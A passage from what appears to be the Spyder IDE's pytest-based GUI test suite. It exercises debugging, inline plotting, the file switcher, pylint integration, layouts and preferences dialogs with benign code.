# Remove breakpoint and close test file
main_window.editor.clear_all_breakpoints()
main_window.editor.close_file()
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(os.name == 'nt', reason="It times out sometimes on Windows")
def test_stop_dbg(main_window, qtbot):
"""Test that we correctly stop a debugging session."""
# Wait until the window is fully up
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None, timeout=SHELL_TIMEOUT)
# Clear all breakpoints
main_window.editor.clear_all_breakpoints()
# Load test file
test_file = osp.join(LOCATION, 'script.py')
main_window.editor.load(test_file)
# Click the debug button
debug_action = main_window.debug_toolbar_actions[0]
debug_button = main_window.debug_toolbar.widgetForAction(debug_action)
with qtbot.waitSignal(shell.executed):
qtbot.mouseClick(debug_button, Qt.LeftButton)
# Move to the next line
with qtbot.waitSignal(shell.executed):
shell.pdb_execute("!n")
# Stop debugging
stop_debug_action = main_window.debug_toolbar_actions[5]
stop_debug_button = main_window.debug_toolbar.widgetForAction(stop_debug_action)
with qtbot.waitSignal(shell.executed):
qtbot.mouseClick(stop_debug_button, Qt.LeftButton)
# Assert there are only two ipdb prompts in the console
assert shell._control.toPlainText().count('IPdb') == 2
# Remove breakpoint and close test file
main_window.editor.clear_all_breakpoints()
main_window.editor.close_file()
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(not sys.platform.startswith('linux'),
reason="It only works on Linux")
def test_change_cwd_dbg(main_window, qtbot):
"""
Test that using the Working directory toolbar is working while debugging.
"""
# Wait until the window is fully up
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None, timeout=SHELL_TIMEOUT)
# Load test file to be able to enter in debugging mode
test_file = osp.join(LOCATION, 'script.py')
main_window.editor.load(test_file)
# Give focus to the widget that's going to receive clicks
control = main_window.ipyconsole.get_widget().get_focus_widget()
control.setFocus()
# Click the debug button
debug_action = main_window.debug_toolbar_actions[0]
debug_button = main_window.debug_toolbar.widgetForAction(debug_action)
qtbot.mouseClick(debug_button, Qt.LeftButton)
qtbot.wait(1000)
# Set LOCATION as cwd
main_window.workingdirectory.chdir(tempfile.gettempdir())
qtbot.wait(1000)
print(repr(control.toPlainText()))
shell.clear_console()
qtbot.wait(500)
# Get cwd in console
qtbot.keyClicks(control, 'import os; os.getcwd()')
qtbot.keyClick(control, Qt.Key_Enter)
qtbot.wait(1000)
# Assert cwd is the right one
assert tempfile.gettempdir() in control.toPlainText()
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(os.name == 'nt' or PY2, reason="It times out sometimes")
def test_varexp_magic_dbg(main_window, qtbot):
"""Test that %varexp is working while debugging."""
nsb = main_window.variableexplorer.current_widget()
# Wait until the window is fully up
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None, timeout=SHELL_TIMEOUT)
# Load test file to be able to enter in debugging mode
test_file = osp.join(LOCATION, 'script.py')
main_window.editor.load(test_file)
# Give focus to the widget that's going to receive clicks
control = main_window.ipyconsole.get_widget().get_focus_widget()
control.setFocus()
# Click the debug button
debug_action = main_window.debug_toolbar_actions[0]
debug_button = main_window.debug_toolbar.widgetForAction(debug_action)
with qtbot.waitSignal(shell.executed):
qtbot.mouseClick(debug_button, Qt.LeftButton)
# Get to an object that can be plotted
for _ in range(2):
with qtbot.waitSignal(shell.executed):
qtbot.keyClicks(control, '!n')
qtbot.keyClick(control, Qt.Key_Enter)
# Generate the plot from the Variable Explorer
nsb.editor.plot('li', 'plot')
qtbot.wait(1000)
# Assert that there's a plot in the console
assert shell._control.toHtml().count('img src') == 1
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(PY2, reason="It times out sometimes")
@pytest.mark.parametrize(
'main_window',
[{'spy_config': ('ipython_console', 'pylab/inline/figure_format', 1)},
{'spy_config': ('ipython_console', 'pylab/inline/figure_format', 0)}],
indirect=True)
def test_plots_plugin(main_window, qtbot, tmpdir, mocker):
"""
Test that plots generated in the IPython console are properly displayed
in the plots plugin.
"""
assert CONF.get('plots', 'mute_inline_plotting') is False
shell = main_window.ipyconsole.get_current_shellwidget()
figbrowser = main_window.plots.current_widget()
# Wait until the window is fully up.
qtbot.waitUntil(lambda: shell._prompt_html is not None,
timeout=SHELL_TIMEOUT)
# Generate a plot inline.
with qtbot.waitSignal(shell.executed):
shell.execute(("import matplotlib.pyplot as plt\n"
"fig = plt.plot([1, 2, 3, 4], '.')\n"))
if CONF.get('ipython_console', 'pylab/inline/figure_format') == 0:
assert figbrowser.figviewer.figcanvas.fmt == 'image/png'
else:
assert figbrowser.figviewer.figcanvas.fmt == 'image/svg+xml'
# Get the image name from the html, fetch the image from the shell, and
# save it as a png.
html = shell._control.toHtml()
img_name = re.search('''<img src="(.+?)" /></p>''', html).group(1)
ipython_figname = osp.join(to_text_string(tmpdir), 'ipython_img.png')
ipython_qimg = shell._get_image(img_name)
ipython_qimg.save(ipython_figname)
# Save the image with the Plots plugin as a png.
plots_figname = osp.join(to_text_string(tmpdir), 'plots_img.png')
mocker.patch('spyder.plugins.plots.widgets.figurebrowser.getsavefilename',
return_value=(plots_figname, '.png'))
figbrowser.save_figure()
assert compare_images(ipython_figname, plots_figname, 0.1) is None
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(
(parse_version(ipy_release.version) >= parse_version('7.23.0') and
parse_version(ipykernel.__version__) <= parse_version('5.5.3')),
reason="Fails due to a bug in the %matplotlib magic")
def test_tight_layout_option_for_inline_plot(main_window, qtbot, tmpdir):
"""
Test that the option to set bbox_inches to 'tight' or 'None' is
working when plotting inline in the IPython console. By default, figures
are plotted inline with bbox_inches='tight'.
"""
tmpdir = to_text_string(tmpdir)
# Assert that the default is True.
assert CONF.get('ipython_console', 'pylab/inline/bbox_inches') is True
fig_dpi = float(CONF.get('ipython_console', 'pylab/inline/resolution'))
fig_width = float(CONF.get('ipython_console', 'pylab/inline/width'))
fig_height = float(CONF.get('ipython_console', 'pylab/inline/height'))
# Wait until the window is fully up.
shell = main_window.ipyconsole.get_current_shellwidget()
client = main_window.ipyconsole.get_current_client()
qtbot.waitUntil(lambda: shell._prompt_html is not None,
timeout=SHELL_TIMEOUT)
# Give focus to the widget that's going to receive clicks
control = main_window.ipyconsole.get_widget().get_focus_widget()
control.setFocus()
# Generate a plot inline with bbox_inches=tight (since it is default) and
# save the figure with savefig.
savefig_figname = osp.join(
tmpdir, 'savefig_bbox_inches_tight.png').replace('\\', '/')
with qtbot.waitSignal(shell.executed):
shell.execute(("import matplotlib.pyplot as plt\n"
"fig, ax = plt.subplots()\n"
"fig.set_size_inches(%f, %f)\n"
"ax.set_position([0.25, 0.25, 0.5, 0.5])\n"
"ax.set_xticks(range(10))\n"
"ax.xaxis.set_ticklabels([])\n"
"ax.set_yticks(range(10))\n"
"ax.yaxis.set_ticklabels([])\n"
"ax.tick_params(axis='both', length=0)\n"
"for loc in ax.spines:\n"
" ax.spines[loc].set_color('#000000')\n"
" ax.spines[loc].set_linewidth(2)\n"
"ax.axis([0, 9, 0, 9])\n"
"ax.plot(range(10), color='#000000', lw=2)\n"
"fig.savefig('%s',\n"
" bbox_inches='tight',\n"
" dpi=%f)"
) % (fig_width, fig_height, savefig_figname, fig_dpi))
# Get the image name from the html, fetch the image from the shell, and
# then save it to a file.
html = shell._control.toHtml()
img_name = re.search('''<img src="(.+?)" /></p>''', html).group(1)
qimg = shell._get_image(img_name)
assert isinstance(qimg, QImage)
# Save the inline figure and assert it is similar to the one generated
# with savefig.
inline_figname = osp.join(tmpdir, 'inline_bbox_inches_tight.png')
qimg.save(inline_figname)
assert compare_images(savefig_figname, inline_figname, 0.1) is None
# Change the option so that bbox_inches=None.
CONF.set('ipython_console', 'pylab/inline/bbox_inches', False)
# Restart the kernel and wait until it's up again
shell._prompt_html = None
client.restart_kernel()
qtbot.waitUntil(lambda: shell._prompt_html is not None,
timeout=SHELL_TIMEOUT)
# Generate the same plot inline with bbox_inches='tight' and save the
# figure with savefig.
savefig_figname = osp.join(
tmpdir, 'savefig_bbox_inches_None.png').replace('\\', '/')
with qtbot.waitSignal(shell.executed):
shell.execute(("import matplotlib.pyplot as plt\n"
"fig, ax = plt.subplots()\n"
"fig.set_size_inches(%f, %f)\n"
"ax.set_position([0.25, 0.25, 0.5, 0.5])\n"
"ax.set_xticks(range(10))\n"
"ax.xaxis.set_ticklabels([])\n"
"ax.set_yticks(range(10))\n"
"ax.yaxis.set_ticklabels([])\n"
"ax.tick_params(axis='both', length=0)\n"
"for loc in ax.spines:\n"
" ax.spines[loc].set_color('#000000')\n"
" ax.spines[loc].set_linewidth(2)\n"
"ax.axis([0, 9, 0, 9])\n"
"ax.plot(range(10), color='#000000', lw=2)\n"
"fig.savefig('%s',\n"
" bbox_inches=None,\n"
" dpi=%f)"
) % (fig_width, fig_height, savefig_figname, fig_dpi))
# Get the image name from the html, fetch the image from the shell, and
# then save it to a file.
html = shell._control.toHtml()
img_name = re.search('''<img src="(.+?)" /></p>''', html).group(1)
qimg = shell._get_image(img_name)
assert isinstance(qimg, QImage)
# Save the inline figure and assert it is similar to the one generated
# with savefig.
inline_figname = osp.join(tmpdir, 'inline_bbox_inches_None.png')
qimg.save(inline_figname)
assert compare_images(savefig_figname, inline_figname, 0.1) is None
# FIXME: Make this test work again in our CIs (it's passing locally)
@pytest.mark.skip
@flaky(max_runs=3)
@pytest.mark.slow
@pytest.mark.use_introspection
def test_switcher(main_window, qtbot, tmpdir):
"""Test the use of shorten paths when necessary in the switcher."""
switcher = main_window.switcher
# Assert that the full path of a file is shown in the switcher
file_a = tmpdir.join('test_file_a.py')
file_a.write('''
def example_def():
pass
def example_def_2():
pass
''')
main_window.editor.load(str(file_a))
main_window.open_switcher()
switcher_paths = [switcher.model.item(item_idx).get_description()
for item_idx in range(switcher.model.rowCount())]
assert osp.dirname(str(file_a)) in switcher_paths or len(str(file_a)) > 75
switcher.close()
# Assert that long paths are shortened in the switcher
dir_b = tmpdir
for _ in range(3):
dir_b = dir_b.mkdir(str(uuid.uuid4()))
file_b = dir_b.join('test_file_b.py')
file_b.write('bar\n')
main_window.editor.load(str(file_b))
main_window.open_switcher()
file_b_text = switcher.model.item(
switcher.model.rowCount() - 1).get_description()
assert '...' in file_b_text
switcher.close()
# Assert search works correctly
search_texts = ['test_file_a', 'file_b', 'foo_spam']
expected_paths = [file_a, file_b, None]
for search_text, expected_path in zip(search_texts, expected_paths):
main_window.open_switcher()
qtbot.keyClicks(switcher.edit, search_text)
qtbot.wait(200)
assert switcher.count() == bool(expected_path)
switcher.close()
# Assert symbol switcher works
main_window.editor.set_current_filename(str(file_a))
code_editor = main_window.editor.get_focus_widget()
with qtbot.waitSignal(
code_editor.completions_response_signal, timeout=30000):
code_editor.document_did_open()
with qtbot.waitSignal(
code_editor.completions_response_signal, timeout=30000):
code_editor.request_symbols()
qtbot.wait(9000)
main_window.open_switcher()
qtbot.keyClicks(switcher.edit, '@')
qtbot.wait(200)
assert switcher.count() == 2
switcher.close()
@flaky(max_runs=3)
@pytest.mark.slow
def test_edidorstack_open_switcher_dlg(main_window, tmpdir):
"""
Test that the file switcher is working as expected when called from the
editorstack.
Regression test for spyder-ide/spyder#10684
"""
# Add a file to the editor.
file = tmpdir.join('test_file_open_switcher_dlg.py')
file.write("a test file for test_edidorstack_open_switcher_dlg")
main_window.editor.load(str(file))
# Test that the file switcher opens as expected from the editorstack.
editorstack = main_window.editor.get_current_editorstack()
assert editorstack.switcher_dlg is None
editorstack.open_switcher_dlg()
assert editorstack.switcher_dlg
assert editorstack.switcher_dlg.isVisible()
assert (editorstack.switcher_dlg.count() ==
len(main_window.editor.get_filenames()))
@flaky(max_runs=3)
@pytest.mark.slow
@pytest.mark.use_introspection
@pytest.mark.skipif(not sys.platform.startswith('linux'),
reason="It times out too much on Windows and macOS")
def test_editorstack_open_symbolfinder_dlg(main_window, qtbot, tmpdir):
"""
Test that the symbol finder is working as expected when called from the
editorstack.
Regression test for spyder-ide/spyder#10684
"""
# Add a file to the editor.
file = tmpdir.join('test_file.py')
file.write('''
def example_def():
pass
def example_def_2():
pass
''')
main_window.editor.load(str(file))
code_editor = main_window.editor.get_focus_widget()
with qtbot.waitSignal(
code_editor.completions_response_signal, timeout=30000):
code_editor.document_did_open()
with qtbot.waitSignal(
code_editor.completions_response_signal, timeout=30000):
code_editor.request_symbols()
qtbot.wait(5000)
# Test that the symbol finder opens as expected from the editorstack.
editorstack = main_window.editor.get_current_editorstack()
assert editorstack.switcher_dlg is None
editorstack.open_symbolfinder_dlg()
assert editorstack.switcher_dlg
assert editorstack.switcher_dlg.isVisible()
assert editorstack.switcher_dlg.count() == 2
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(sys.platform == 'darwin',
reason="Times out sometimes on macOS")
def test_run_static_code_analysis(main_window, qtbot):
"""This tests that the Pylint plugin is working as expected."""
from spyder.plugins.pylint.main_widget import PylintWidgetActions
# Select the third-party plugin
pylint_plugin = main_window.get_plugin(Plugins.Pylint)
# Do an analysis
test_file = osp.join(LOCATION, 'script_pylint.py')
main_window.editor.load(test_file)
pylint_plugin.get_action(PylintWidgetActions.RunCodeAnalysis).trigger()
qtbot.wait(3000)
# Perform the test
# Check output of the analysis
treewidget = pylint_plugin.get_widget().get_focus_widget()
qtbot.waitUntil(lambda: treewidget.results is not None,
timeout=SHELL_TIMEOUT)
result_content = treewidget.results
assert result_content['C:']
pylint_version = parse_version(pylint.__version__)
if pylint_version < parse_version('2.5.0'):
number_of_conventions = 5
else:
number_of_conventions = 3
assert len(result_content['C:']) == number_of_conventions
# Close the file
main_window.editor.close_file()
@flaky(max_runs=3)
@pytest.mark.slow
def test_troubleshooting_menu_item_and_url(main_window, qtbot, monkeypatch):
"""Test that the troubleshooting menu item calls the valid URL."""
application_plugin = main_window.application
MockQDesktopServices = Mock()
mockQDesktopServices_instance = MockQDesktopServices()
attr_to_patch = ('spyder.utils.qthelpers.QDesktopServices')
monkeypatch.setattr(attr_to_patch, MockQDesktopServices)
# Unit test of help menu item: Make sure the correct URL is called.
application_plugin.trouble_action.trigger()
assert MockQDesktopServices.openUrl.call_count == 1
mockQDesktopServices_instance.openUrl.called_once_with(__trouble_url__)
@flaky(max_runs=3)
@pytest.mark.slow
@pytest.mark.skipif(os.name == 'nt', reason="It fails on Windows")
def test_help_opens_when_show_tutorial_full(main_window, qtbot):
"""
Test fix for spyder-ide/spyder#6317.
'Show tutorial' opens the help plugin if closed.
"""
HELP_STR = "Help"
help_pane_menuitem = None
for action in main_window.layouts.plugins_menu.get_actions():
if action.text() == HELP_STR:
help_pane_menuitem = action
break
# Test opening tutorial with Help plugin closed
main_window.help.toggle_view_action.setChecked(False)
qtbot.wait(500)
help_tabbar, help_index = find_desired_tab_in_window(HELP_STR, main_window)
assert help_tabbar is None and help_index is None
assert not isinstance(main_window.focusWidget(), ObjectComboBox)
assert not help_pane_menuitem.isChecked()
main_window.help.show_tutorial()
qtbot.wait(500)
help_tabbar, help_index = find_desired_tab_in_window(HELP_STR, main_window)
assert None not in (help_tabbar, help_index)
assert help_index == help_tabbar.currentIndex()
assert help_pane_menuitem.isChecked()
# Test opening tutorial with help plugin open, but not selected
help_tabbar.setCurrentIndex((help_tabbar.currentIndex() + 1)
% help_tabbar.count())
qtbot.wait(500)
help_tabbar, help_index = find_desired_tab_in_window(HELP_STR, main_window)
assert None not in (help_tabbar, help_index)
assert help_index != help_tabbar.currentIndex()
assert help_pane_menuitem.isChecked()
main_window.help.show_tutorial()
qtbot.wait(500)
help_tabbar, help_index = find_desired_tab_in_window(HELP_STR, main_window)
assert None not in (help_tabbar, help_index)
assert help_index == help_tabbar.currentIndex()
assert help_pane_menuitem.isChecked()
# Test opening tutorial with help plugin open and the active tab
qtbot.wait(500)
main_window.help.show_tutorial()
help_tabbar, help_index = find_desired_tab_in_window(HELP_STR, main_window)
qtbot.wait(500)
assert None not in (help_tabbar, help_index)
assert help_index == help_tabbar.currentIndex()
assert help_pane_menuitem.isChecked()
@pytest.mark.slow
@flaky(max_runs=3)
def test_report_issue(main_window, qtbot):
"""Test that the report error dialog opens correctly."""
main_window.console.report_issue()
qtbot.wait(300)
assert main_window.console.get_widget()._report_dlg is not None
assert main_window.console.get_widget()._report_dlg.isVisible()
assert main_window.console.get_widget()._report_dlg.close()
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(
sys.platform.startswith('linux'), reason="It segfaults on Linux")
def test_custom_layouts(main_window, qtbot):
"""Test that layout are showing the expected widgets visible."""
mw = main_window
mw.first_spyder_run = False
prefix = 'window' + '/'
settings = mw.layouts.load_window_settings(prefix=prefix, default=True)
# Test layout changes
for layout_idx in get_class_values(DefaultLayouts):
with qtbot.waitSignal(mw.sig_layout_setup_ready, timeout=5000):
layout = mw.layouts.setup_default_layouts(
layout_idx, settings=settings)
qtbot.wait(500)
for area in layout._areas:
if area['visible']:
for plugin_id in area['plugin_ids']:
if plugin_id not in area['hidden_plugin_ids']:
plugin = mw.get_plugin(plugin_id)
print(plugin) # spyder: test-skip
try:
# New API
assert plugin.get_widget().isVisible()
except AttributeError:
# Old API
assert plugin.isVisible()
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(not running_in_ci() or sys.platform.startswith('linux'),
reason="Only runs in CIs and fails on Linux sometimes")
def test_programmatic_custom_layouts(main_window, qtbot):
"""
Test that a custom layout gets registered and it is recognized."""
mw = main_window
mw.first_spyder_run = False
# Test layout registration
layout_id = 'testing layout'
# Test the testing plugin is being loaded
mw.get_plugin('spyder_boilerplate')
# Get the registered layout
layout = mw.layouts.get_layout(layout_id)
with qtbot.waitSignal(mw.sig_layout_setup_ready, timeout=5000):
mw.layouts.quick_layout_switch(layout_id)
qtbot.wait(500)
for area in layout._areas:
if area['visible']:
for plugin_id in area['plugin_ids']:
if plugin_id not in area['hidden_plugin_ids']:
plugin = mw.get_plugin(plugin_id)
print(plugin) # spyder: test-skip
try:
# New API
assert plugin.get_widget().isVisible()
except AttributeError:
# Old API
assert plugin.isVisible()
@pytest.mark.slow
@flaky(max_runs=3)
def test_save_on_runfile(main_window, qtbot):
"""Test that layout are showing the expected widgets visible."""
# Load test file
test_file = osp.join(LOCATION, 'script.py')
test_file_copy = test_file[:-3] + '_copy.py'
shutil.copyfile(test_file, test_file_copy)
main_window.editor.load(test_file_copy)
code_editor = main_window.editor.get_focus_widget()
# Verify result
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None,
timeout=SHELL_TIMEOUT)
qtbot.keyClicks(code_editor, 'test_var = 123', delay=100)
filename = code_editor.filename
with qtbot.waitSignal(shell.sig_prompt_ready):
shell.execute('runfile("{}")'.format(remove_backslashes(filename)))
assert shell.get_value('test_var') == 123
main_window.editor.close_file()
os.remove(test_file_copy)
@pytest.mark.slow
@pytest.mark.skipif(sys.platform == 'darwin', reason="Fails on macOS")
def test_pylint_follows_file(qtbot, tmpdir, main_window):
"""Test that file editor focus change updates pylint combobox filename."""
pylint_plugin = main_window.get_plugin(Plugins.Pylint)
# Show pylint plugin
pylint_plugin.dockwidget.show()
pylint_plugin.dockwidget.raise_()
# Create base temporary directory
basedir = tmpdir.mkdir('foo')
# Open some files
for idx in range(2):
fh = basedir.join('{}.py'.format(idx))
fname = str(fh)
fh.write('print("Hello world!")')
main_window.open_file(fh)
qtbot.wait(200)
assert fname == pylint_plugin.get_filename()
# Create a editor split
main_window.editor.editorsplitter.split(orientation=Qt.Vertical)
qtbot.wait(500)
# Open other files
for idx in range(4):
fh = basedir.join('{}.py'.format(idx))
fh.write('print("Hello world!")')
fname = str(fh)
main_window.open_file(fh)
qtbot.wait(200)
assert fname == pylint_plugin.get_filename()
# Close split panel
for editorstack in reversed(main_window.editor.editorstacks):
editorstack.close_split()
break
qtbot.wait(1000)
@pytest.mark.slow
@flaky(max_runs=3)
def test_report_comms_error(qtbot, main_window):
"""Test if a comms error is correctly displayed."""
CONF.set('main', 'show_internal_errors', True)
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None,
timeout=SHELL_TIMEOUT)
# Create a bogus get_cwd
with qtbot.waitSignal(shell.executed):
shell.execute('def get_cwd(): import foo')
with qtbot.waitSignal(shell.executed):
shell.execute("get_ipython().kernel.frontend_comm."
"register_call_handler('get_cwd', get_cwd)")
with qtbot.waitSignal(shell.executed, timeout=3000):
shell.execute('ls')
qtbot.waitUntil(lambda: main_window.console.error_dialog is not None,
timeout=EVAL_TIMEOUT)
error_dialog = main_window.console.error_dialog
assert 'Exception in comms call get_cwd' in error_dialog.error_traceback
assert 'No module named' in error_dialog.error_traceback
main_window.console.close_error_dialog()
CONF.set('main', 'show_internal_errors', False)
@pytest.mark.slow
@flaky(max_runs=3)
def test_break_while_running(main_window, qtbot, tmpdir):
"""Test that we can set breakpoints while running."""
# Create loop
code = ("import time\n"
"for i in range(100):\n"
" print(i)\n"
" time.sleep(0.1)\n"
)
p = tmpdir.join("loop_script.py")
p.write(code)
test_file = to_text_string(p)
# Wait until the window is fully up
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None,
timeout=SHELL_TIMEOUT)
# Main variables
debug_action = main_window.debug_toolbar_actions[0]
debug_button = main_window.debug_toolbar.widgetForAction(debug_action)
# Load test file
main_window.editor.load(test_file)
code_editor = main_window.editor.get_focus_widget()
# Clear all breakpoints
main_window.editor.clear_all_breakpoints()
# Click the debug button
with qtbot.waitSignal(shell.executed):
qtbot.mouseClick(debug_button, Qt.LeftButton)
qtbot.wait(1000)
# Continue debugging
qtbot.keyClicks(shell._control, '!c')
qtbot.keyClick(shell._control, Qt.Key_Enter)
qtbot.wait(500)
with qtbot.waitSignal(shell.executed):
# Set a breakpoint
code_editor.debugger.toogle_breakpoint(line_number=3)
# We should drop into the debugger
with qtbot.waitSignal(shell.executed):
qtbot.keyClicks(shell._control, '!q')
qtbot.keyClick(shell._control, Qt.Key_Enter)
# Clear all breakpoints
main_window.editor.clear_all_breakpoints()
# --- Preferences
# ----------------------------------------------------------------------------
def preferences_dialog_helper(qtbot, main_window, section):
"""
Open preferences dialog and select page with `section` (CONF_SECTION).
"""
main_window.show_preferences()
preferences = main_window.preferences
container = preferences.get_container()
qtbot.waitUntil(lambda: container.dialog is not None,
timeout=5000)
dlg = container.dialog
index = dlg.get_index_by_name(section)
page = dlg.get_page(index)
dlg.set_current_index(index)
return dlg, index, page
@pytest.mark.slow
def test_preferences_run_section_exists(main_window, qtbot):
"""
Test for spyder-ide/spyder#13524 regression.
Ensure the Run section exists.
"""
assert preferences_dialog_helper(qtbot, main_window, 'run')
@pytest.mark.slow
def test_preferences_checkboxes_not_checked_regression(main_window, qtbot):
"""
Test for spyder-ide/spyder/#10139 regression.
Enabling codestyle/docstyle on the completion section of preferences,
was not updating correctly.
"""
# Reset config
CONF.set('completions',
('provider_configuration', 'lsp', 'values', 'pydocstyle'),
False)
CONF.set('completions',
('provider_configuration', 'lsp', 'values', 'pycodestyle'),
False)
# Open completion prefences and update options
dlg, index, page = preferences_dialog_helper(qtbot, main_window,
'completions')
# Get the correct tab pages inside the Completion preferences page
tnames = [page.tabs.tabText(i).lower() for i in range(page.tabs.count())]
tabs = [(page.tabs.widget(i).layout().itemAt(0).widget(), i)
for i in range(page.tabs.count())]
tabs = dict(zip(tnames, tabs))
tab_widgets = {
'code style and formatting': 'code_style_check',
'docstring style': 'docstring_style_check'
}
for tabname in tab_widgets:
tab, idx = tabs[tabname]
check_name = tab_widgets[tabname]
check = getattr(tab, check_name)
page.tabs.setCurrentIndex(idx)
check.animateClick()
qtbot.wait(500)
dlg.ok_btn.animateClick()
preferences = main_window.preferences
container = preferences.get_container()
qtbot.waitUntil(lambda: container.dialog is None,
timeout=5000)
# Check the menus are correctly updated
count = 0
for menu_item in main_window.source_menu_actions:
if menu_item and isinstance(menu_item, QAction):
print(menu_item.text(), menu_item.isChecked())
if 'code style' in menu_item.text():
assert menu_item.isChecked()
count += 1
elif 'docstring style' in menu_item.text():
assert menu_item.isChecked()
count += 1
assert count == 2
# Reset config
CONF.set('completions',
('provider_configuration', 'lsp', 'values', 'pydocstyle'),
False)
CONF.set('completions',
('provider_configuration', 'lsp', 'values', 'pycodestyle'),
False)
@pytest.mark.slow
def test_preferences_change_font_regression(main_window, qtbot):
"""
Test for spyder-ide/spyder/#10284 regression.
Changing font resulted in error.
"""
dlg, index, page = preferences_dialog_helper(qtbot, main_window,
'appearance')
for fontbox in [page.plain_text_font.fontbox,
page.rich_text_font.fontbox]:
fontbox.setFocus()
idx = fontbox.currentIndex()
fontbox.setCurrentIndex(idx + 1)
dlg.ok_btn.animateClick()
preferences = main_window.preferences
container = preferences.get_container()
qtbot.waitUntil(lambda: container.dialog is None,
timeout=5000)
@pytest.mark.slow
@pytest.mark.skipif(
not sys.platform.startswith('linux'),
reason="Changes of Shitf+Return shortcut cause an ambiguous shortcut")
def test_preferences_empty_shortcut_regression(main_window, qtbot):
"""
Test for spyder-ide/spyder/#12992 regression.
Overwriting shortcuts results in a shortcuts conflict.
"""
# Wait until the window is fully up
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None,
timeout=SHELL_TIMEOUT)
# Setup shortcuts (set run cell and advance shortcut to run selection)
base_run_cell_advance = CONF.get_shortcut(
'editor', 'run cell and advance') # Should be Shift+Return
base_run_selection = CONF.get_shortcut(
'editor', 'run selection') # Should be F9
assert base_run_cell_advance == 'Shift+Return'
assert base_run_selection == 'F9'
CONF.set_shortcut(
'editor', 'run cell and advance', '')
CONF.set_shortcut(
'editor', 'run selection', base_run_cell_advance)
main_window.shortcuts.apply_shortcuts()
# Check execution of shortcut
# Create new file
main_window.editor.new()
code_editor = main_window.editor.get_focus_widget()
code_editor.set_text(u'print(0)\nprint(ññ)')
with qtbot.waitSignal(shell.executed):
qtbot.keyClick(code_editor, Qt.Key_Return, modifier=Qt.ShiftModifier)
qtbot.waitUntil(lambda: u'print(0)' in shell._control.toPlainText())
assert u'ññ' not in shell._control.toPlainText()
# Reset shortcuts
CONF.set_shortcut(
'editor', 'run selection', 'F9')
CONF.set_shortcut(
'editor', 'run cell and advance', 'Shift+Return')
main_window.shortcuts.apply_shortcuts()
qtbot.wait(500) # Wait for shortcut change to actually be applied
# Check shortcut run cell and advance reset
code_editor.setFocus()
with qtbot.waitSignal(shell.executed):
qtbot.keyClick(code_editor, Qt.Key_Return, modifier=Qt.ShiftModifier)
qtbot.waitUntil(lambda: 'runcell(0' in shell._control.toPlainText())
@pytest.mark.slow
def test_preferences_shortcut_reset_regression(main_window, qtbot):
"""
Test for spyder-ide/spyder/#11132 regression.
Resetting shortcut resulted in error.
"""
dlg, index, page = preferences_dialog_helper(qtbot, main_window,
'shortcuts')
page.reset_to_default(force=True)
dlg.ok_btn.animateClick()
preferences = main_window.preferences
container = preferences.get_container()
qtbot.waitUntil(lambda: container.dialog is None,
timeout=5000)
@pytest.mark.slow
@pytest.mark.order(1)
def test_preferences_change_interpreter(qtbot, main_window):
"""Test that on main interpreter change signal is emitted."""
# Check original pyls configuration
lsp = main_window.completions.get_provider('lsp')
config = lsp.generate_python_config()
jedi = config['configurations']['pylsp']['plugins']['jedi']
assert jedi['environment'] is None
assert jedi['extra_paths'] == []
# Change main interpreter on preferences
dlg, index, page = preferences_dialog_helper(qtbot, main_window,
'main_interpreter')
page.cus_exec_radio.setChecked(True)
page.cus_exec_combo.combobox.setCurrentText(sys.executable)
with qtbot.waitSignal(main_window.sig_main_interpreter_changed,
timeout=5000, raising=True):
dlg.ok_btn.animateClick()
# Check updated pyls configuration
config = lsp.generate_python_config()
jedi = config['configurations']['pylsp']['plugins']['jedi']
assert jedi['environment'] == sys.executable
assert jedi['extra_paths'] == []
@pytest.mark.slow
def test_preferences_last_page_is_loaded(qtbot, main_window):
# Test that the last page is updated on re open
dlg, index, page = preferences_dialog_helper(qtbot, main_window,
'main_interpreter')
preferences = main_window.preferences
container = preferences.get_container()
qtbot.waitUntil(lambda: container.dialog is not None,
timeout=5000)
dlg.ok_btn.animateClick()
qtbot.waitUntil(lambda: container.dialog is None,
timeout=5000)
main_window.show_preferences()
qtbot.waitUntil(lambda: container.dialog is not None,
timeout=5000)
dlg = container.dialog
assert dlg.get_current_index() == index
dlg.ok_btn.animateClick()
qtbot.waitUntil(lambda: container.dialog is None,
timeout=5000)
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.use_introspection
@pytest.mark.skipif(not sys.platform.startswith('linux'),
reason="It times out too much on Windows and macOS")
def test_go_to_definition(main_window, qtbot, capsys):
"""Test that go-to-definition works as expected."""
# --- Code that gives no definition
code_no_def = dedent("""
from qtpy.QtCore import Qt
Qt.FramelessWindowHint""")
# Create new editor with code and wait until LSP is ready
main_window.editor.new(text=code_no_def)
code_editor = main_window.editor.get_focus_widget()
with qtbot.waitSignal(
code_editor.completions_response_signal, timeout=30000):
code_editor.document_did_open()
# Move cursor to the left one character to be next to
# FramelessWindowHint
code_editor.move_cursor(-1)
with qtbot.waitSignal(
code_editor.completions_response_signal):
code_editor.go_to_definition_from_cursor()
# Capture stderr and assert there are no errors
sys_stream = capsys.readouterr()
assert sys_stream.err == u''
# --- Code that gives definition
code_def = "import qtpy.QtCore"
# Create new editor with code and wait until LSP is ready
main_window.editor.new(text=code_def)
code_editor = main_window.editor.get_focus_widget()
with qtbot.waitSignal(
code_editor.completions_response_signal, timeout=30000):
code_editor.document_did_open()
# Move cursor to the left one character to be next to QtCore
code_editor.move_cursor(-1)
with qtbot.waitSignal(
